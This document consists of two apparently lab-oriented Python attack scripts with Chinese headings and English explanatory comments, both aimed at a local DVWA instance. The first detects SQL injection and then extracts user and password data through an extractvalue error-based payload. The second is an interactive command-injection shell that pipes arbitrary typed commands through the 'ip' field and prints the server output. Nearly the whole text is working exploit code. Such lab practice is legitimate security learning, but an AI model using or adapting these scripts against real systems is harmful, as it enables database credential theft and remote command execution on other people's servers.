sql注入报错exp
import requests
import re
# Lab session state: a fixed PHPSESSID and the DVWA "security=low" cookie are
# hard-coded, so the script is bound to that one logged-in session and level.
cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
# Local DVWA SQLi page. "%23" is the URL-encoded "#" and is part of the URL
# text as written; the payloads built from `url` below also end in "%23".
url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1"
# Query-string tokens split on "&": ["Submit=Submit%23", "id=1"].
parms = url[url.index("?")+ 1:].split("&")
def checksql() -> bool | None:
    """Probe each query-string token for an echoed database syntax error.

    For every entry in the module-level ``parms`` list a single quote is
    appended to that token and the page is fetched with the lab ``cookies``.
    If the response body contains the text ``'SQL syntax'`` the token is
    printed and ``True`` is returned immediately.  When no token triggers
    the message the function falls off the end and returns ``None``, which
    is why the caller compares the result against ``True`` explicitly.

    The probe only works because the application echoes the raw database
    error to the client; server-side, it shows up as requests whose
    parameter value carries a trailing ``'`` followed by a DB syntax error.
    """
    for parm in parms:
        # str.replace substitutes every occurrence of the token text in the
        # URL; each token here is a distinct "name=value" string.
        sqlurl = url.replace(parm, parm + "'")
        req = requests.get(sqlurl, cookies=cookies)
        if 'SQL syntax' in req.text:
            print("存在sql注入")  # "SQL injection present"
            print("[+]SQL注入点是:%s[+]" % parm)  # "[+]injection point is:%s[+]"
            return True
def getStr(res: str, sql: str) -> str:
    """Send one error-based extraction request and return the captured text.

    ``sql`` is substituted into the ``{}`` placeholder of an ``extractvalue``
    payload appended to the module-level ``url``; the request relies on the
    page echoing the resulting database error (see ``checksql``).  ``res``
    is a regex with one capture group that is searched in the response body;
    group 1 is returned.

    Raises:
        AttributeError: if ``res`` does not match the response body
            (``re.search`` returns ``None`` and ``.group`` is then called).
    """
    payload = url + "'and(extractvalue(1,concat(0x7e,(select {} from users limit 1),0x7e)))%23".format(sql)
    req = requests.get(url=payload,cookies=cookies)
    # 0x7e is the tilde character, which is why the callers' patterns are
    # anchored on "~".
    html = re.search(res,req.text).group(1)
    return html
def exploit() -> str:
    """Read ``concat(user,password)`` for the first ``users`` row in pieces.

    Three ``getStr`` calls: the total length first, then characters 1-32,
    then characters from position 32 to the end.  SQL ``substring``
    positions are 1-based, so position 32 is fetched by both slices and
    appears twice in the returned string.  The pieces are concatenated
    behind a Chinese label ("account and password").
    """
    # Non-raw string: "\d" is an invalid escape sequence and warns on recent
    # Python versions, although it still reaches re.search as "\d".
    strlen=getStr("~(\d+)~","length(concat(user,password))")
    # Capture runs up to the next single quote in the response.
    pwd1 = getStr("~(.*)'","substring(concat(user,password),1,32)")
    # Capture runs up to the closing tilde; length comes from the first call.
    pwd2 = getStr("~(.*)~","substring(concat(user,password),32,%s)"% strlen)
    return "[+]账号 and 密码:"+pwd1+pwd2
# Script entry point: only run the extraction when the probe found the error
# signature.  checksql() returns None when nothing matched, so the explicit
# "== True" comparison is what keeps the fall-through case from proceeding.
if checksql()==True:
    print(exploit())
命令执行
import requests
import base64
# Same lab session as the SQLi script: fixed PHPSESSID plus the DVWA
# "security=low" cookie, so the script is bound to that one session.
cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
# Local DVWA command-execution page; requests are POSTed here.
url = "http://127.0.0.1/vulnerabilities/exec/"
# Interactive loop with no exit condition: reads a command from stdin, POSTs it
# to the DVWA exec page as the tail of the "ip" field, and prints the part of
# the response rendered inside the <pre> block.  Ends only on an exception
# (e.g. KeyboardInterrupt).
while True:
    # The input is base64-encoded and decoded again on the next line; the
    # decoded text equals the original input, so this round-trip changes
    # nothing about what is sent.
    cmdline = base64.b64encode(input('请输入你的命令<<<').encode("utf-8"))  # prompt: "enter your command<<<"
    # Form value is "127.0.0.1|<input>": the expected IP followed by a pipe
    # and the user-supplied text.
    data = {'ip':'127.0.0.1|'+str(base64.b64decode(cmdline),"utf-8"),'Submit':'Submit'}
    req = requests.post(url=url,data=data,cookies=cookies)
    # Slice out the text between "<pre>" and "</pre>".  str.index raises
    # ValueError if either tag is missing (e.g. a login redirect or error page).
    getdata = req.text[req.text.index('<pre>')+5:req.text.index('</pre>')]
    if getdata == '':
        print("命令错误")  # "command error"
    else:
        print(getdata)